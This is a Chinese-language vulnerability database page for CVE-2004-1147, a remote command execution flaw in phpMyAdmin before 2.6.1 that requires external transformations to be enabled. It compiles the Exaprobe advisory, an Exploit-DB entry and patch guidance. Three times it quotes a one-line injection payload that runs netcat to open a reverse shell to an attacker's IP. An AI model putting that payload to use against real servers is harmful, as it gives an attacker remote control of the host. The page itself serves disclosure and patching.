CVE-2004-1147
CVSS10.0
发布时间 :2005-01-10 00:00:00
修订时间 :2016-10-17 22:51:44
NMCOEPS    

[原文]phpMyAdmin 2.6.0-pl2, and other versions before 2.6.1, with external transformations enabled, allows remote attackers to execute arbitrary commands via shell metacharacters.


[CNNVD]phpMyAdmin ExternalTransformations 远程命令执行漏洞(CNNVD-200501-165)

        phpMyAdmin是一个免费工具,用于通过Web界面管理MySQL数据库。
        phpMyAdmin 2.6.0-p12及其他2.6.1之前的版本中存在远程代码执行漏洞。
        当配置为启用external transformations时,远程攻击者可利用此漏洞,通过Shell执行任意指令。

- CVSS (基础分值)

CVSS分值: 10 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

cpe:/a:phpmyadmin:phpmyadmin:2.5.2
cpe:/a:phpmyadmin:phpmyadmin:2.5.1
cpe:/a:phpmyadmin:phpmyadmin:2.5.4
cpe:/a:phpmyadmin:phpmyadmin:2.5.5
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc2
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.5.7
cpe:/a:phpmyadmin:phpmyadmin:2.5.5_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.5.7_pl1
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl3
cpe:/a:phpmyadmin:phpmyadmin:2.5.0
cpe:/a:phpmyadmin:phpmyadmin:2.4.0
cpe:/a:phpmyadmin:phpmyadmin:2.5.6_rc1
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl2
cpe:/a:phpmyadmin:phpmyadmin:2.6.0_pl1

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1147
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1147
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200501-165
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=110295781828323&w=2
(UNKNOWN)  BUGTRAQ  20041213 Multiple vulnerabilities in phpMyAdmin
http://www.exaprobe.com/labs/advisories/esa-2004-1213.html
(UNKNOWN)  MISC  http://www.exaprobe.com/labs/advisories/esa-2004-1213.html
http://xforce.iss.net/xforce/xfdb/18441
(UNKNOWN)  XF  phpmyadmin-command-execute(18441)

- 漏洞信息

phpMyAdmin ExternalTransformations 远程命令执行漏洞
危急 输入验证
2005-01-10 00:00:00 2005-10-20 00:00:00
远程  
        phpMyAdmin是一个免费工具,用于通过Web界面管理MySQL数据库。
        phpMyAdmin 2.6.0-p12及其他2.6.1之前的版本中存在远程代码执行漏洞。
        当配置为启用external transformations时,远程攻击者可利用此漏洞,通过Shell执行任意指令。

- 公告与补丁

        目前厂商已经发布了升级补丁以修复此安全问题,补丁获取链接:
        http://www.phpmyadmin.net/home_page/downloads.php

- 漏洞信息 (24817)

phpMyAdmin 2.x External Transformations Remote Command Execution (EDBID:24817)
php webapps
2004-12-13 Verified
0 Nicolas Gregoire
N/A [点击下载]
source: http://www.securityfocus.com/bid/11886/info

phpMyAdmin is reported prone to multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands and disclose files on a vulnerable computer. These issues result from insufficient sanitization of user-supplied data.

The command execution is reported to be present since phpMyAdmin 2.6.0-pl2. The file disclosure is present since phpMyAdmin 2.4.0.

F\';nc -e /bin/sh $IP 80;echo \'A		

- 漏洞信息 (F35314)

phpMyAdmin261rc1.txt (PacketStormID:F35314)
2004-12-30 00:00:00
Nicolas Gregoire  exaprobe.com
advisory,vulnerability
CVE-2004-1147,CVE-2004-1148
[点击下载]

phpMyAdmin versions prior to 2.6.1-rc1 suffer from command execution and file disclosure vulnerabilities.

Exaprobe
                            www.exaprobe.com

                           Security Advisory

 Advisory Name: Multiple vulnerabilities in phpMyAdmin
  Release Date: 13 December 2004
   Application: phpMyAdmin prior to 2.6.1-rc1
      Platform: Any webserver running PHP
      Severity: Remote code execution
        Author: Nicolas Gregoire <ngregoire@exaprobe.com>
 Vendor Status: Updated code is available
CVE Candidates: CAN-2004-1147 and CAN-2004-1148
     Reference: www.exaprobe.com/labs/advisories/esa-2004-1213.html


Overview :
==========

phpMyAdmin is a tool written in PHP intended to handle the 
administration of MySQL over the Web. Currently it can create and
drop databases, create/drop/alter tables, delete/edit/add fields,
execute any SQL statement, manage keys on fields, manage privileges,
export data into various formats and is available in 47 languages.


Technical details :
===================

Command execution :

	- bug introduced in 2.6.0-pl2
	- attacker does *not* need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- external transformations must be activated
	- sample of offensive value : F\';nc -e /bin/sh $IP 80;echo \'A

File disclosure :

	- attacker need access to the phpMyAdmin interface
	- PHP safe mode must be off
	- $cfg['UploadDir'] must be defined
	- exploitation is done via 'sql_localfile'


Vendor Response :
=================

After notification by Exaprobe, maintainers of the phpMyAdmin
project have released version 2.6.1-rc1 which fixes these two
vulnerabilities.


Recommendation :
================

Upgrade to 2.6.1-rc1 or newer.
Desactivate uploads and transformations if possible.


CVE Information :
=================

The Common Vulnerabilities and Exposures (CVE) project has assigned 
the following names to these issues.  These are candidates for 
inclusion in the CVE list (http://cve.mitre.org), which standardizes 
names for security problems.

  CAN-2004-1147  Command execution in phpMyAdmin
  CAN-2004-1148  File disclosure in phpMyAdmin

-- 
Nicolas Gregoire ----- Consultant en S    

- 漏洞信息

12330
phpMyAdmin External Transformations Remote Command Execution
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

phpMyAdmin contains a flaw that will allow an attacker to inject arbitrary SQL code. The problem is on systems where PHP safe mode is disabled and external MIME-based transformations is activated, MySQL data is not verified properly and will allow an attacker to inject or manipulate SQL queries, which may lead to a loss of integrity.

- 时间线

2004-12-13 Unknow
2004-12-13 Unknow

- 解决方案

Upgrade to version 2.6.1-rc1 or higher, as it has been reported to fix this vulnerability. It is also possible to correct the flaw by implementing the following workaround(s): Setting PHP safe mode to ON. If not feasible, deactivate MIME-based external transformations.

- 相关参考

- 漏洞作者

- 漏洞信息

phpMyAdmin Multiple Remote Vulnerabilities
Input Validation Error 11886
Yes No
2004-12-13 12:00:00 2009-07-12 08:07:00
Discovery is credited to Nicolas Gregoire <ngregoire@exaprobe.com>.

- 受影响的程序版本

S.u.S.E. Linux Personal 9.2
S.u.S.E. Linux Personal 9.1
S.u.S.E. Linux Personal 9.0 x86_64
S.u.S.E. Linux Personal 9.0
S.u.S.E. Linux Personal 8.2
S.u.S.E. Linux 8.1
S.u.S.E. Linux 8.0 i386
S.u.S.E. Linux 8.0
phpMyAdmin phpMyAdmin 2.6 .0pl3
phpMyAdmin phpMyAdmin 2.6 .0pl2
+ Gentoo Linux 1.4
+ Gentoo Linux
+ Gentoo Linux
+ Gentoo Linux
phpMyAdmin phpMyAdmin 2.6 .0pl1
phpMyAdmin phpMyAdmin 2.5.7 pl1
phpMyAdmin phpMyAdmin 2.5.7
phpMyAdmin phpMyAdmin 2.5.6 -rc1
phpMyAdmin phpMyAdmin 2.5.5 pl1
phpMyAdmin phpMyAdmin 2.5.5 -rc2
phpMyAdmin phpMyAdmin 2.5.5 -rc1
phpMyAdmin phpMyAdmin 2.5.5
phpMyAdmin phpMyAdmin 2.5.4
phpMyAdmin phpMyAdmin 2.5.2
phpMyAdmin phpMyAdmin 2.5.1
phpMyAdmin phpMyAdmin 2.5 .0
phpMyAdmin phpMyAdmin 2.4 .0
phpMyAdmin phpMyAdmin 2.6.1 -rc1

- 不受影响的程序版本

phpMyAdmin phpMyAdmin 2.6.1 -rc1

- 漏洞讨论

phpMyAdmin is reported prone to multiple remote vulnerabilities. These issues can allow remote attackers to execute arbitrary commands and disclose files on a vulnerable computer. These issues result from insufficient sanitization of user-supplied data.

The command execution is reported to be present since phpMyAdmin 2.6.0-pl2. The file disclosure is present since phpMyAdmin 2.4.0.

- 漏洞利用

An exploit is not required.

The following proof of concept for the command execution is available:
F\';nc -e /bin/sh $IP 80;echo \'A

- 解决方案

Gentoo has released an advisory to provide updates for this issue. Updates may be applied by issuing the following commands as the superuser:

emerge --sync
emerge --ask --oneshot --verbose ">=dev-db/phpmyadmin-2.6.1_rc1"

The vendor has released an advisory and phpMyAdmin 2.6.1-rc1 to address these issues.

SuSE Linux has released a security summary report (SUSE-SR:2005:003) that contains fixes to address this and other vulnerabilities. Customers are advised to peruse the referenced advisory for further information regarding obtaining and applying appropriate updates.


phpMyAdmin phpMyAdmin 2.4 .0

phpMyAdmin phpMyAdmin 2.5 .0

phpMyAdmin phpMyAdmin 2.5.1

phpMyAdmin phpMyAdmin 2.5.2

phpMyAdmin phpMyAdmin 2.5.4

phpMyAdmin phpMyAdmin 2.5.5 -rc2

phpMyAdmin phpMyAdmin 2.5.5

phpMyAdmin phpMyAdmin 2.5.5 -rc1

phpMyAdmin phpMyAdmin 2.5.5 pl1

phpMyAdmin phpMyAdmin 2.5.6 -rc1

phpMyAdmin phpMyAdmin 2.5.7

phpMyAdmin phpMyAdmin 2.5.7 pl1

phpMyAdmin phpMyAdmin 2.6 .0pl1

phpMyAdmin phpMyAdmin 2.6 .0pl3

phpMyAdmin phpMyAdmin 2.6 .0pl2

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站